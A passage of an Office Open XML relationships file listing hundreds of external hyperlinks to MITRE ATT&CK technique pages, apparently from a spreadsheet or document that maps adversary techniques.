Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/003" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/003" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/004" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/004" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/005" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/009" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1207" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/010" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1486" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/008" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1601/001" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/004" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/004" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1185" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074/002" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1573/001" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/005" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/011" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/001" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/005" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/003" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1095" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016/001" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560/002" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1619" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1039" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/001" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/008" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/003" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/002" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/004" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/001" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/002" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1613" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1615" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/007" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/008" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/003" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/001" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052/001" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/003" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/001" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/007" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/005" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/013" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/003" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/003" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/001" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/001" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/003" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1008" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/004" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/012" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1557/001" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/004" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1554" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/010" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1106" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/003" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/003" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1530" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/003" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/009" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/001" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/005" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/002" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/009" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/002" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/003" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/002" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/003" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/010" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1480/001" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/004" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/001" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/002" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/002" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/011" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/004" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586/001" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/005" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/006" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/002" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/004" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/001" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/012" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/002" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216/001" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/006" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/002" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1565/002" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1568/001" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1599/001" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/012" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/003" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/002" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/001" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1539" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/003" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/004" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110/001" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/005" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1602/002" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/001" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/008" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/001" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/005" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/012" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/004" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/002" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/004" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/003" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/001" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/001" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/003" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1491/001" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/001" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/005" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/005" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/013" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/001" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/012" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555/004" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127/001" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/003" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/003" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/006" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021/005" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/001" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/003" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/003" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/002" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/005" TargetMode="External"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1535" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1612" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/001" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/003" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498/001" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/001" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/007" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/003" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/002" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/003" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/004" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195/002" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/004" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1197" TargetMode="External"/><Relationship Id="rId104" 